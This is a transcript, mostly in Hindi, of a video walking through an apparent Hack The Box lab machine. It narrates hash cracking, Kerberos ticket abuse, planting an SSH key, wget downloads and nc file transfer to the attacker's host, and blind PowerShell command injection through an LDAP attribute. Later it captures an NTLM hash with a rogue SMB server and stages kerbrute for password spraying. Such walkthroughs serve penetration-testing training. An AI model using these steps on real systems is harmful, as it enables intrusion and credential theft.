सबसे पहले मैं इसको एक फाइल में सेव करता हूँ। लेट्स सी, तो नैनो हैश, परफेक्ट। अब मैं इसको हैश कैट से क्रैक करता हूँ। वाई इट्स कीप डिक्रीजिंग, आई एम नॉट श्योर। ओके, सो जो मेरी बैश आरसी फाइल है उसको मैंने जस्ट एडिट किया था, तो उसमें जो नैनो है उसको मैंने एज अ विम इंटरप्रेट कर रखा है। सो दैट्स वाई। सो मेरे को यहाँ पे यूज़ करना होगा WQ, नाउ नैनो हैश अगेन। एंड आई एम नॉट अ बिग फैन ऑफ विम, बट मैंने सीखने के लिए ऐसा किया। बट फॉर द सेक ऑफ वीडियो मैं इसको सिंपल ही रखता हूँ। नाउ कैट हैश, यस वी हैव दैट हैश। ओके, डॉलर इंटरप्रेट हुआ है। लेट्स सी, हैश। यहाँ पे मैं कोडियम पे आता हूँ, यहाँ पे एक नई फाइल बना लेता हूँ सिंपल, एंड यहाँ से इसको सेव कर देता हूँ। तो फाइल का नाम होगा हैश, परफेक्ट। एंड लेट मी क्रैक इट। तो हैश कैट हैश, एंड यहाँ पे आएगा वर्ल्ड लिस्ट जो है ऑप्ट सेट लिस्ट पासवर्ड लीक डेटाबेसेस rockyou.txt। लेट्स सी, ओके, सो आई एम नॉट श्योर कि जो मेरा हैश कैट है वो वर्क क्यों नहीं करता लिनक्स में। सो इसको क्रैक करने के लिए मैं आ जाता हूँ अपने होस्ट मशीन पे जो कि है विंडो मशीन। तो यहाँ पे मैं इसको क्रैक करता हूँ, हैश कैट डॉट ई एक्स सी हैश रॉक्यू। लेट्स सी, तो ये पासवर्ड जो है, ये हैश जो है मैंने ऑलरेडी क्रैक कर रखा है। सो मेरे को इसमें ज़्यादा टाइम नहीं लगे, एंड हैशकैट ही मेरे को खुद कह देगा कि आप शो फ्लैग का यूज़ करो एंड डायरेक्ट पासवर्ड देख लो। बट आई जस्ट वांटेड टू शो कि आप कैसे हैशकैट को यूज़ करते हैं। सो क्योंकि अब हैशकैट जो है वो अपग्रेड हो चुका है, तो उसका ऑटो मोड जो है वो हैश का मेथड और यू कैन से टाइप ऑफ हैश को डिटेक्ट करके उसको ऑटो क्रैक करता है, राइट। सो यहाँ पे मैं सिंपल शो को यूज़ करता हूँ, शो, and we can see the password. It's taking time, yeah, we can see the password, that is Pantera, right। so इसको मैं यहाँ पे सेव कर लेता हूँ। let's see, और let me edit my bash rc file really quick, codium bash rc nano, and I guess here, let's see, nano t, yes, perfect। फाइल को क्लोज कर देता हूँ, एंड नाउ वी हैव द पासवर्ड पेंटेरा फॉर द यूज़र रे डनकन, राइट। एंड सो उसको मैं डायरेक्ट यहाँ पे यूज़ करूँगा, सो एंड पेंटेरा। सो द एरर कम्स ऑथेंटिकेशन फेलियर, राइट। सो एक चीज़ को हमको यहाँ पे माइंड में रखना है कि ये जो मशीन है ये एडी में जुड़ी हुई है, राइट। रे डनकन के पास परमिशंस होंगी खुद को ऑथेंटिकेट करने के लिए इस मशीन पर एज अ रूट यूज़र। तो उसके लिए हम एक बार टिकट फॉर्म को भी यूज़ कर सकते हैं। तो उसके लिए मैं यहाँ पे यूज़ करूँगा के इनिट का, के इनिट रे डनकन। इससे मैं रे डनकन की टिकट को इनिशलाइज करूँगा, पेंटेरा, परफेक्ट। के लिस्ट से मैं उसकी टिकट को चेक करूँगा, वी हैव द टिकट। अब के एस यू से मैं इसमें यूजिंग टिकट रूट परफॉर्म करूँगा, और जो हमारी ऑथराइजेशन के लिए चीज़ चेक होगी वो होगी टिकट। नाउ वी आर द रूट ऑन द वेब सर्वर। बट हमको ये चीज़ नहीं भूलनी कि अभी हम एक एडी एनवायरनमेंट में, राइट। तो अगर मैं इफ कॉन्फिग करूँ, नॉट इफ कॉन्फिग, आई पी ए डी डी आर, so our IP is 192.168.100। ओके, सो सबसे पहले मैं यहाँ पे रूट की होम डायरेक्टरी में आता हूँ, यूज़र डॉट टी एक्स टी को रीड करता हूँ। उसके बाद मैं आता हूँ SSH डायरेक्टरी के अंदर, जहाँ पे ऑथराइज की में मैं अपनी SSH की को पुट कर देता हूँ। सो SSH ID RSA डॉट पब एंड आइकॉनिक पैरट। तो यहाँ पे मैं की को पुट कर देता हूँ और अपेंड करता हूँ, परफेक्ट। तो यहाँ पे मैं SSH लॉगिन करता हूँ।
ssh root @windcorp portal windcorp. Okay, perfect. So we are a root on one machine. Now we have to find other machines in AD environment. So उसके लिए मैं ping का भी यूज़ कर सकता हूँ, बट मैं यहाँ पे यूज़ करूँगा nmap का. ओके, सो nmap के लिए भी मैं दो चीज़ों का यूज़ कर सकता हूँ कि मैं एक प्रॉक्सी बना के देन nmap का यूज़ करूँ, जो कि काफ़ी ज़्यादा स्लो होगा. एंड दूसरा जो है कि मैं एक nmap की स्टैटिक बाइनरी डाउनलोड करूँ, एंड उस स्टैटिक बाइनरी को मैं रूट सर्वर पे प्लेस करके वहाँ से अपना स्कैन परफॉर्म करूँ, जो कि काफ़ी फास्ट होगा. स्टैटिक nmap बाइनरी गिटहब. तो मैं nmap की स्टैटिक बाइनरी को डाउनलोड करता हूँ. डाउनलोड, एंड आई गेस कि यहाँ पे nmap है या नहीं. ओके, nmap इज़ नॉट देयर. तो नाउ मैं अपनी nmap बाइनरी को डब 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 डेटा के अंदर मूव कर लेता हूँ. डब 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 एंड मूव डाउनलोड्स nmap. परफेक्ट. यहाँ पे एक पाइथन सर्वर क्रिएट कर देता हूँ. पाइथन -http सर्वर. परफेक्ट. यहाँ पे आता हूँ टेम्प डायरेक्टरी पे एंड wget http 10 10 14 67 8000 nmap. यहाँ पे मैं इसको एग्जीक्यूटेबल परमिशन देता हूँ nmap. अब मैं यहाँ पे इसको सिंपल रन कर देता हूँ. 192.168.0.124 अनेबल टू फाइंड nmap सर्विसेज. श्योर, आई थिंक मैंने गलत स्टैटिक बाइनरी डाउनलोड कर लिया है. लेट मी गो टू दिस फर्स्ट लिंक अगेन एंड यहाँ पे डाउनलोड करता हूँ इसे. लेट्स सी. ओके, हाँ ये सही फाइल है. जो मेरी पहली nmap की फाइल थी वो 6 पॉइंट कुछ MB की थी. एंड इसको यहाँ से मैं रिमूव करता हूँ. रिमूव nmap. डाउनलोड nmap हेयर एंड पाइथन का सर्वर क्रिएट किया. अगेन उसको डाउनलोड करता हूँ. लेट्स सी, वी हैव nmap.1. इसको मैं मूव कर दूंगा nmap पे. टेकिंग लॉन्ग टाइम. ओके परफेक्ट. सो हमारी बाइनरी डाउनलोड हो गई है. मूव nmap.1 टू nmap. परफेक्ट. इसको मैं chmod परमिशन दे देता हूँ. आई एम नॉट श्योर कि उसमें पहले से होगी या नहीं. नहीं है. nmap. परफेक्ट. nmap 192.168.0.1/24. परफेक्ट. तो ये स्कैन जब तक पूरा होता है मैं वीडियो को पॉज कर देता हूँ. तो हमारा जो स्कैन है वो काफ़ी जल्दी ही फिनिश हो गया. एंड द अदर IP दैट इज़ ओपन इज 192.168.0.2. एंड इसका जो होस्ट नेम है वो है hope.window.com, windcorp.htp. सो इसको भी मैं अपनी होस्ट फाइल में ऐड कर देता हूँ. nano etc host sudo hope.windcorp 192.168.0.2. परफेक्ट. नाउ देर आर SMB पोर्ट इज़ ऑल्सो ओपन. तो मैं यहाँ पे सर्च करता हूँ कि SMB क्लाइंट है या नहीं. सो नहीं है. सो मैं क्या करता हूँ, मैं एक रिवर्स प्रॉक्सी क्रिएट करता हूँ. ओके, नाउ लेट्स सी. ssh -t 1080 root at web portal windcorp. परफेक्ट. एंड प्रॉक्सी चेन्स. लेट मी सी कि मेरे पास प्रॉक्सी चेन्स है भी या नहीं. तो प्रॉक्सी चेन्स. ओके, प्रॉक्सी चेन्स इज देयर. cat etc proxy chains में भी. ओके, इस फाइल को मैं एडिट करता हूँ. sudo nano. यहाँ पे पोर्ट नंबर करता हूँ मैं 1080. परफेक्ट. प्रॉक्सी चेन्स एंड SMB
एसएमबी क्लाइंट को यूज़ करने से पहले मुझे रे डंकन का टोकन इनिशिएट करना होगा। सो ओके, के इनिट नॉट फाउंड, sudo apt इंस्टॉल के इनिट में भी। सो बाइनरी डाउनलोड हो गई है। लेट्स सी, प्रॉक्सी चेन्स के इनिट रे डंकन के इनिट नॉट फाउंड। ओके, लेट्स सी किसको कैसे इंस्टॉल करते हैं। के इनिट एडी डाउनलोड ubuntu मे बी, Kerberos for ubuntu, yes. So I have to use this command. Perfect. Kinit is there. Yes, it is. So proxy chains. Now kinit ray duncan. Perfect. Oh shoot. Let's see. ये 4.2.2.2 पे क्यों रीडायरेक्ट हो रहा है? लेट मी रीड द कॉन्फ़िगरेशन फाइल krb5.conf. ओके, सो आई हैव टू एडिट दिस फाइल। फॉर दैट मैं वापस से अपने रूट सर्वर पे आता हूँ एंड सिंपल इसी की krb5 को इधर कॉपी कर दूंगा। सो krb.conf एंड देखने में बड़ी लग रही है बट काफ़ी सारी चीज़ें इसमें जो है वो कमेंट आउट हो रखी हैं। सो लेट्स सी एंड sudo। तो यहाँ पे इन सब चीज़ों को मैं कर देता हूँ डिलीट। सीम्स गुड, परफेक्ट। लेट्स सी कि अब ये सही ऑथेंटिकेशन करता है या नहीं। परफेक्ट। नाउ आई हैव टू यूज पेंटेरा एंड अगेन ओके। सो लेट्स सी ओके। सो हमारा जो एडमिन सर्वर है वो है hopewindcorp.com। मे बी अ टाइपो, बट इसको मैं अपने होस्ट फाइल में ऐड कर लेता हूँ क्योंकि एरर आई गेस उसी वजह से आ रहा था। sudo nano etc, क्योंकि फाइल तो हमने चेंज कर दी थी राइट। सो एरर आने का कोई मतलब नहीं था, बट लेट्स सी। देन एक और होस्ट नेम ऐड कर देता हूँ मैं, windcorp.com एंड यहाँ पे एक और चीज़ ऐड कर देता हूँ, windcorp.htb। परफेक्ट। सो लेट्स सी के इनिट रे डंकन पेंटेरा अगेन शूट। ओके, सो मैंने वीडियो पॉज करके इसमें कम से कम आधे से पौन घंटा दिया, बट लिटरली आई हैव नो आइडिया कि वर्क क्यों नहीं कर रहा। क्योंकि सेम सेटिंग्स मेरी अदर वीएम में भी है जिससे एक्चुअली में मैं हैक द बॉक्स को परफॉर्म करता हूँ रिकॉर्डिंग से अलग। जो मेरा मेन लैपटॉप है उसमें भी मेरी जो कर्ब्रोस फाइल की सेटिंग है वो भी यही है। बट रियली आई एम नॉट श्योर कि इसमें क्या इशू आ रहा है, डीएनएस कैशे का, आई एम रियली नॉट श्योर। सो मैं क्या करता हूँ, मैं अपने मेन लैपटॉप में स्विच होता हूँ और वहाँ से रिकॉर्डिंग को कंटिन्यू करता हूँ। सो मैं दूसरी मशीन में स्विच हो गया हूँ ना। यहाँ से हम वीडियो को रिज्यूम करते हैं। अब हमको एसएमबी क्लाइंट परफॉर्म करना था राइट। सो मैंने प्रॉक्सी ऑलरेडी बना रखी है। ये सिंपल प्रॉक्सी की कमांड वही थी, SSH -t 1080 देन रूट @windcorp.htb और IP। सो यहाँ पे मैं लिखता हूँ प्रॉक्सी चेंज एसएमबी क्लाइंट then K for Kerberos authentication, -L for listing here's and hope windcorp.htb। परफेक्ट। ओके, सो ये जो एरर है ये इसलिए आ रहा है क्योंकि अभी हमने रे डंकन का जो टोकन है, टिकट है, उसको अपनी मेमोरी में सेव नहीं किया। तो उसके लिए मैं यूज़ करूँगा प्रॉक्सी चेंज के इनिट रे डंकन। परफेक्ट। एंड यहाँ पे मैं इसका पासवर्ड डालूंगा बट इट्स टेकिंग टू लॉन्ग। लेट्स सी, या
सो पेंटेरा, परफेक्ट। अब मैं के लिस्ट से इसकी टिकट चेक करूँगा, के लिस्ट, एंड मैं आपको अपनी ETC कर्व फाइल भी शो कर देता हूँ, राइट। ETC KRB5conf एंड सी, ये एक सिंपल फाइल है एंड इसमें खाली मैंने उन कमेंट्स को रिमूव किया एंड थोड़ी बहुत प्रॉपर्टीज़ को रिमूव किया है जो कि उतना ज़्यादा मैटर नहीं करती, बट आई एम नॉट श्योर कि मैं पैरेट से क्यों प्रॉक्सी चेंज को यूज़ नहीं कर पा रहा था, आई रियली नॉट श्योर। सो अब मैं अगेन assembly client कमांड को रन करता हूँ एंड लेट्स सी। सो वी हैव दीज मनी शेयर्स, राइट। नाउ जो सबसे यूनिक शेयर है वो है WC शेयर। अब मैं इसको एक बार व्यू करता हूँ, WC शेयर, गलत कमांड मैंने टाइप कर दी, यहाँ पे मेरे को रिमूव करना होगा -L, वरना वो लिस्ट करेगा। परफेक्ट, लेट्स सी कि इस assembly शेयर में क्या क्या है। तो ls temp एक डायरेक्टरी है इसमें। नाउ temp के अंदर वी हैव वन debug user.txt फाइल। लेट्स सी more debug user.txt, वी हैव दिस डेटा हियर। ओके, फाइल को मैं डाउनलोड कर लेता हूँ। सो debug user.txt। नाउ इधर से मैं सेशन को एंड करता हूँ एंड दूसरे शेयर को एनुमरेट करूँगा। तो दूसरे शेयर को एक बार मैं चेक कर लेता हूँ। आई डोंट थिंक कि वी हैव परमिशन ऑन एडमिन C एंड IPC। सो नेटलॉगन को मैं डायरेक्ट चेक करूँगा, WC नाउ नेटलॉगन। हियर वी हैव दीज 3 फाइल्स, जिसमें से एक जो है वो form.ps1 है, दूसरा अपडेट फोन LN के आई थिंक कोई शॉर्टकट होगा, एंड थर्ड जो है वो इमेज है विंडकॉप logo.png की। ओके, सो मैं इन तीनों फाइलों को डाउनलोड करता हूँ। उसके लिए मैं यूज़ करूँगा mget एंड यस यस एंड यस। नाउ इस सेशन को भी मैं क्लोज करता हूँ एंड लेट्स सी कि फाइल्स में क्या क्या है। सबसे पहले हम ओपन करते हैं विंडकॉप लोगो को। लेट्स सी कि इसका लोगो कैसा दिखता है। इट्स वेरी सिंपल। नाउ वी हैव दिस form.ps1 एंड इस फॉर्म में जो है LDAP यूज़ हो रहा है एंड ये LDAP यूज़र DN पे रिक्वेस्ट बना रहा है। लेट्स सी, सो इस फॉर्म में कुछ सेक्शंस हैं, जैसे कि एक सेक्शन है क्रिएट फॉर्म एंड आई थिंक क्रिएट फॉर्म ही एक सेक्शन है, एंड वेरी एंड में यहाँ पे जो है ये मोबाइल नंबर को आई गेस अपडेट कर रहा है यूजिंग वेरिएबल $x। बट लेट मी सी कि ये जो टेक्स्ट बॉक्स डॉट टेक्स्ट है ये कहाँ से आ रहा है। ओके, सो ये इनका एक आई गेस टेक्स्ट बॉक्स होगा जिसमें ये यूज़र से मोबाइल को एंटर करवा रहे हैं एंड देन उस मोबाइल की इंफॉर्मेशन को अपडेट कर रहे हैं, एंड उस चीज़ को अपडेट करने के लिए ये लोग यहाँ पे LDAP का यूज़ कर रहे हैं। ओके, सो लेट मी एनुमरेट द LDAP सर्वर्स। सो LDAP के लिए मैं सिंपल यहाँ पे टाइप करूँगा LDAP सर्च -x एंड देन -b फॉर बेस, एंड बेस है हमारा DC इज इक्वल टू विनकॉप, एंड यहाँ पे डॉट की जगह आएगा कॉमा DC HTB। देन वी हैव टू स्पेसिफाई द LDAP होस्ट, एंड LDAP होस्ट के लिए हम करेंगे LDAP देन सेमी कॉलन और सॉरी कॉलन होप डॉट विंडकॉप डॉट HTB। लेट्स सी। ओके, आई थिंक हमको दूसरे स्लैशेस का यूज़ करना होगा। तो लेट्स सी ऑपरेशन। ओके, आई थिंक वी हैव टू रिक्वेस्ट द रे डनकन ticket here again। so kinit ray duncan pantera, again password is wrong, pantera, perfect। now let's try this again। in order to perform must be completed on the connection। okay, so let me remove this -x। let's see, so we have that data, right। इसको मैं एक फाइल में कॉपी कर लेता हूँ। so for that temp dot temp then LDAP data dot txt, परफेक्ट। अब मैं इसको अपनी मशीन में मूव करता हूँ इस फाइल को। फॉर दैट आई यूज़ cd temp then nc
10 10 14 67 port 9001 and ldep data.txt. परफेक्ट. सो यहाँ पे मैं लिसन करता हूँ. netcat nc minus nlvp 9001 ldep data.txt. परफेक्ट. लेट्स सी. आई थिंक हमारी जो फाइल है वो कंप्लीट ट्रांसफ़र हो चुकी होगी. सो मैं यहाँ पे कनेक्शन को ब्रेक करता हूँ and let me read that file. ldep data.txt. We have very large file which contains very large amount of data. हमको वो फॉर्म भी मिला था राइट, एंड उसमें वो मोबाइल को अपडेट करा देते. तो यहाँ पे मैं मोबाइल एट्रीब्यूट को सर्च करूँगा, मोबाइल, and we have 4 instances of mobile, right? You can see on very left at the bottom 4 out of 4. So इस नंबर को, एंड वी हैव दैट गेट users.txt, राइट, जो हमें wc शेयर से मिली थी. लेट मी सी दैट एज वेल. तो इसको भी मैं ओपन करता हूँ, सबल debug user.txt, एंड यहाँ से मैं इस मोबाइल नंबर को कॉपी करूँगा एंड इसको मैं ldep डेटा में सर्च करता हूँ. सो वहाँ जो मोबाइल नंबर है वो इस एट्रीब्यूट से आ रहा है, राइट. सो नाउ हमको क्या चेक करना है कि अगर मैं इस एट्रीब्यूट को अपडेट करूँ विथ ldep मॉडिफाई, सो वो चेंजेस क्या रिफ्लेक्ट होंगे इस फाइल में या नहीं. ऐसा मैं इसलिए कह रहा हूँ, अगर मैं दोबारा से assembly क्लाइंट को रन करूँ विद दैट पर्टिकुलर शेयर. सो नाउ अगेन टेम्प फोल्डर के अंदर जाता हूँ मैं, एंड इफ़ यू सी जो यहाँ की डेट है वो रिसेंट डेट है, राइट. आज 13 अप्रैल है एंड उसमें टाइम भी जो है वो काफ़ी रिसेंट है, एंड करंट टाइम जो है वो 13:55 हो रहा है. सो ये 2 मिनट पहले ही अपडेट हुई है, राइट. सो ये फाइल जो है ये रेगुलरली अपडेट हो रही है. तो अब मैं क्या करूँगा, इस एट्रीब्यूट को मॉडिफाई करूँगा ldep मॉडिफाई की हेल्प से, एंड लेट्स सी कि यहाँ पे जो डेटा है वो अपडेट होता है या नहीं. ओके, सो इसके लिए मैं यहाँ पे एक चेंज ldif फाइल बनाता हूँ, एंड यहाँ पे मैं सिंपल लिखता हूँ dn है हमारा, लेट्स सी, डिस्टिंग्विश नेम है हमारा ये. इसको मैं यहाँ से कॉपी कर लेता हूँ एंड सिंपल यहाँ पे पेस्ट कर देता हूँ. इसके बाद यहाँ पे मैं लिखूँगा चेंज टाइप, कि मेरे को क्या चेंज करना है. सॉरी, किस टाइप का चेंज करना है. तो मुझे मॉडिफिकेशन करनी है, उसके लिए मैं यूज़ करूँगा मॉडिफाई. देन मेरे को मॉडिफाई क्या करना है, मॉडिफाई मेरे को करना है रिप्लेस करना है मुझे मोबाइल नंबर को, राइट. सो उसके लिए मैं लिखूँगा रिप्लेस मोबाइल. देन मोबाइल की जो न्यू वैल्यू सेट करनी है वो आएगा इस लाइन में एट द वेरी एंड. यहाँ पे मैं लिख दूँगा टेस्ट, राइट. सो लेट्स सी, यहाँ पे मैं यूज़ करता हूँ ldep मॉडिफाई, देन -h फॉर ldep hope.windcop.htb, then -f for file, I am not sure. लेट्स सी. ओके, आई गेस स्लैश जो है वो दूसरे आएंगे, ldep मे बी दिस, लेट्स सी. सो हमने जो है वो डेटा को मॉडिफाई कर दिया है. यहाँ पे मैं दोबारा से ls करूँगा, एंड आई थिंक वी हैव 1 मिनट, क्योंकि ये जो स्क्रिप्ट है आई गेस हर 2 मिनट पे रन हो रही है, राइट. सो लेट्स वेट फॉर अ मिनट एंड सी. हमारी जो फाइल है वो अपडेट हो चुकी है, एंड इसका जो डेटा लेंथ है वो भी 88 से चेंज होकर 85 हो गया है. अब मैं इसको एक बार व्यू करता हूँ. सो मोर debug user.txt. So we see our modification is reflecting here, right. Now the thing is this form is executing by PowerShell, right. तभी तो इसका जो एक्सटेंशन है वो form.ps1 है, राइट. सो ये एक ps1 स्क्रिप्ट है जो कि एग्जीक्यूट हो रही है PowerShell के थ्रू. नाउ द थिंग इज, यहाँ पे हम ट्राई कर सकते हैं कमांड इंजेक्शन. वो कैसे, लेट मी शो यू. अगर ये चीज़ PowerShell के थ्रू इंटरप्रेट हो रही है, तो मैं यहाँ पे सिंपल लिखूँगा डॉलर देन हु एम आई. सो इसको हम आई थिंक ब्लाइंड कमांड इंजेक्शन कह सकते हैं, जो कि हम ldep के थ्रू परफॉर्म करेंगे. सो मैं दोबारा से इसको मॉडिफाई करता हूँ, एंड लेट्स वेट फॉर द मिनट और 2, लेट्स सी. सो वी अगेन ओनली हैव 1 मिनट, आई गेस 1 or 2 minutes. So let's wait and we'll see.
सो जो हमारी फाइल है वो अपडेट हो चुकी है। अब मैं इसको दोबारा से व्यू करता हूँ। उसके लिए मैं टाइप करूँगा अगेन मोर debug users डॉट txt एंड वी कैन सी कि हमारा जो ब्लाइंड कमांड इंजेक्शन है वो सक्सेसफुली रन हो रहा है। सो नाउ अब हम इसमें क्या कर सकते हैं कि यूजिंग IWR और एनी मेथड वी कैन ट्रांसफर अ नेटकेट फाइल एंड वी कैन गेट अ रिवर्स शेल, राइट। बट इसमें जो है वो एक ऐप लॉकर रन हो रहा है, जिस वजह से हम ऐसा नहीं कर पाएंगे। उसको मैं नेक्स्ट स्टेप में डिफ़ाइन करूँगा, क्योंकि अगर मैं उसको इस स्टेप में डिफ़ाइन करूँगा तो ये वीडियो काफ़ी लेंदी हो जाएगा एंड काफ़ी स्लो रिस्पॉन्स आ रहा है, तो वो एक काफ़ी इरिटेटिंग पार्ट हो जाएगा, राइट। सो अभी मैं डायरेक्ट ये शो करता हूँ कि किस तरीके से हमको इसमें शेल लेना है। सो उस शेल के लिए मैं यूज़ करूँगा SMB और सर्वर का, जो कि मैं क्रिएट करूँगा अपने होस्ट मशीन पे एंड यूजिंग प्रॉक्सी आई विल मेक that hope.windcorp server to make a request in on my host machine on my Linux machine, right? So let me show you, then I think it will be more clear for you. तो सबसे पहले मैं क्या करूँगा, मैं यहाँ पे यूजिंग नेटकैट पोर्ट 445 पे लिसन करूँगा। सो NC-NLVP 445। अब यहाँ पे मैं इस LD फाइल को थोड़ा मॉडिफाई करता हूँ। उसके लिए मैं यहाँ पे यूज़ करूँगा नेट व्यू कमांड को एंड नेट व्यू के बाद वेब सर्वर डॉट विंडकॉप डॉट HTTP। तो इफ़ मशीन जो है वो रिक्वेस्ट क्रिएट करेगी तो वो रिक्वेस्ट हमको इधर रिफ्लेक्ट होगी, राइट। और अगर कोई एरर आता है तो वो हमको इस फाइल में रिफ्लेक्ट हो जाएगा। सो यहाँ पे मैं इसको अगेन मॉडिफाई कर देता हूँ दोबारा से एंड लेट्स फॉर अ मिनट और टू। वी गॉट द रिस्पॉन्स ऑन आर पोर्ट 445। सो इसका मतलब जो है वो जो hope.windcorp.htp मशीन है वो हमारी रिक्वेस्ट पे सक्सेसफुली रिस्पॉन्स क्रिएट कर रही है, राइट। सो अब मैं क्या करूँगा, इस पोर्ट को फॉरवर्ड कर दूंगा अपनी मशीन पे, ताकि जो ये रिस्पॉन्स है ये मेरी मशीन पे फॉरवर्ड हो जाए एंड वहाँ से मैं हैश को ग्रैब कर लूँ, राइट। सो सबसे पहले मैं यहाँ पे एक और छोटा सा पेन ओपन करता हूँ एंड यहाँ पे मैं रन करता हूँ SMB server.py and knee is the share name एंड डॉट इज़ फॉर करेंट वर्किंग डायरेक्टरी एंड यहाँ पे मैं SMB2 सपोर्ट को भी इनेबल करता हूँ, क्योंकि अभी की जो विंडोज़ मशीन है, रिसेंट मशीन्स, उनमें हमें SMB2 सपोर्ट्स को स्पेसिफाई करना पड़ता है। आई गेस आफ्टर विंडोज 7 और 8 इट इज़ नेसेसरी, राइट। सो अब मेरे को यहाँ पे दोबारा से SSH करना होगा एंड SSH के लिए मैं एक न्यू पेन ओपन करता हूँ एंड वहाँ पे मैं सबसे पहले अपनी SSH सर्विस को स्टार्ट करूँगा। तो उसके लिए sudo user sbin sshd -t एंड -p फॉर पोर्ट एंड पोर्ट नंबर आई विल स्पेसिफाई quad 2। ओके, अब मैं एक और पेन ओपन करता हूँ जहाँ पे मैं SSH की लोकल पोर्ट फॉरवर्डिंग को इनेबल करूँगा। सो उसके लिए मैं यूज़ करूँगा SSH देन -f देन n देन L फॉर लोकल पोर्ट फॉरवर्डिंग। उसके बाद आई हैव टू स्पेसिफाई द IP। तो IP होगा 192.168.0.100 जो कि इस मशीन का IP है एंड उसके बाद पोर्ट 445 एंड ये जो पोर्ट 445 है ये इस रूट वेब सर्वर का पोर्ट है, राइट। उसके बाद यहाँ पे आएगा मेरा IP 10.10.14.67 एंड यहाँ पे मेरा पोर्ट नंबर। तो मेरा भी जो पोर्ट नंबर होगा वो होगा 445। उसके बाद SSH के लिए मैं कौन सा पोर्ट यूज़ करूँगा, वो पोर्ट है quad 2 सॉरी। देन उसके बाद मेरी मशीन का नेम एंड मशीन का IP। सो 1467। तो कमांड जो है वो एकदम करेक्ट है। इसको मैं यहाँ से कॉपी करता हूँ एंड यहाँ पे पेस्ट कर देता हूँ, परफेक्ट। यहाँ से मैं इसको एडिट कर देता हूँ, कैंसिल कर देता हूँ। यहाँ पे मैं टाइप कर देता हूँ यस एंड इट विल आस्क फॉर अ पासवर्ड, राइट। ओके, परफेक्ट। नाउ जो हमारा पोर्ट 445 है वो लिसन कर रहा है इनकमिंग ट्रैफिक के लिए। सो अगर मैं करूँ sudo ss lntp, let's see here, I guess it will reflect you 445
यस 445, और वैसे भी वो रिफ्लेक्ट करेगा ही क्योंकि यहाँ पे मैंने एसएमबी सर्वर जो रन कर रखा है। तो नाउ मैं एनसी की हेल्प से पोर्ट ओपन करता हूँ, एनसी -nlvp पोर्ट 445, एंड यहाँ पे मैं इंट्रोड्यूस करूँगा के फ्लैग को ताकि ये जो कनेक्शन है ये रिड्यूस ना हो। ओके सो सॉरी, यहाँ पे मेरे को नेटकैट से पोर्ट ओपन नहीं करना था क्योंकि मैंने पहले ही वो पोर्ट को फॉरवर्ड कर दिया था एंड समहाउ आई फॉरगॉट दिस, बट दैट्स नॉट अ इशू। हमको हमारा जो हैश है वो मिल चुका है। अब मैं इस हैश को क्रैक करता हूँ। सो यहाँ पे मैं कॉपी कर लेता हूँ एंड यहाँ पे मैं इस एसएमबी सर्वर को क्लोज कर देता हूँ। सो नैनो हैश, एंड इसको मैं एडिट करके यहाँ पे एसएमबी हैश को पुट कर देता हूँ एंड हैश कैट को रन करता हूँ, हैश कैट देन हैश, एंड उसके बाद हमारा rocky.txt, सो आउट सेकलिस्ट पासवर्ड लेक डेटाबेसेस पासवर्ड्स में भी और rocky.txt परफेक्ट। तो यहाँ पे मेरा हैश कैट रन हो रहा है एंड इट विल सोन डिटेक्ट क्रैक दैट हैश। सो यहाँ पे इसको कन्फ्यूज़न हो रहा है कि ये एक्चुअल मोड कौन सा है। उसके लिए यहाँ पे मैं इसको मैनुअली स्पेसिफाई कर देता हूँ कि एक्चुअल जो मोड है वो है 5600। सो लेट्स वेट फॉर अ मिनट और मे बी लेस देन अ मिनट। सो हमारा हैश जो है वो क्रैक हो चुका है एंड द पासवर्ड इज दिस। राइट, इसको मैं कॉपी कर लेता हूँ एक फाइल में। तो नैनो हैश, एंड यहाँ पे मैं इसको कॉपी कर लेता हूँ। परफेक्ट, नाउ वी हैव दैट LDAP डेटा, राइट। अब LDAP डेटा से मैं सारे यूज़र नेम्स को ग्रैब करूँगा क्योंकि मैं ये चेक करना चाह रहा हूँ कि ये जो पासवर्ड है कितनी बार रीयूज़ हुआ है। उसके लिए मैं यहाँ से करूँगा कैट LDAP एंड ग्रैब फॉर सेम अकाउंट नेम, एंड यहाँ से मैं उन सारे नेम्स को रिमूव कर दूंगा जिनके एंड में डॉलर है क्योंकि मोस्टली ये कंप्यूटर अकाउंट्स होते हैं और सर्विस अकाउंट्स होते हैं दैट आई डोंट नीड। सो ग्रैप -v एंड यहाँ पे मेरे को एस्केप करना होगा डॉलर को एंड अगेन डॉलर को प्लेस करना होगा। परफेक्ट, अब मैं ऑक की हेल्प से इसको फिल्टर आउट कर लेता हूँ। सो ऑक देन प्रिंट $1, प्रिंट $1 और 2, या 2 इज़ द करेक्ट वन। एंड अब इस आउटपुट को मैं user.txt में मूव कर देता हूँ। सो user.txt, परफेक्ट, get user.txt एंड वी हैव दीज मैनी यूजर्स। अब इसको ब्रूट फोर्स करने के लिए और पासवर्ड की रीयूजेबिलिटी को पता करने के लिए मैं यूज़ करूँगा कर्बरूट टूल का। तो कर्बरूट को मैं डाउनलोड कर लेता हूँ और आई थिंक मेरी मशीन में कर्बरूट होना तो चाहिए, बट आई हैव टू सी cd www, क्योंकि ये मेरी लिनक्स मिंट मशीन है एंड लिनक्स मिंट मशीन से ही मैंने इस मशीन को फर्स्ट टाइम हैक किया था। तो yt then www एंड वी हैव कर्बरूट हियर, राइट। सो इस कर्बरूट को मैं मूव कर लेता हूँ www डायरेक्टरी में, जो कि है मेरी ये वाली डायरेक्टरी कर्बरूट cp then yt then www और कर्बरूट। अब मैं इस कर्बरूट को अपने रूट वेब सर्वर पे डाउनलोड करता हूँ। सो उसके लिए wget http 1010 1467 एंड पोर्ट जो है वो होगा 8000, पोर्ट 8000 एंड यहाँ पे टूल का नाम जो है कर्बरूट। सो आई गेस दिस ओके। सो मैंने एक्चुअली पाइथन सर्वर को क्लोज कर दिया था, तो मैं उसको दोबारा से क्रिएट करता हूँ। पाइथन सर्वर, करेक्ट। नाउ लेट्स ट्राई अगेन एंड वी एट हमारा जो डाउनलोड है वो सक्सेसफुल हो रहा है। परफेक्ट, सो वी डाउनलोडेड दैट फाइल। अब मैं यहाँ पे chmod की परमिशन दूंगा, chmod +x कर्बरूट, परफेक्ट। एंड यहाँ पे मैं user.txt को भी डाउनलोड करूँगा। सो
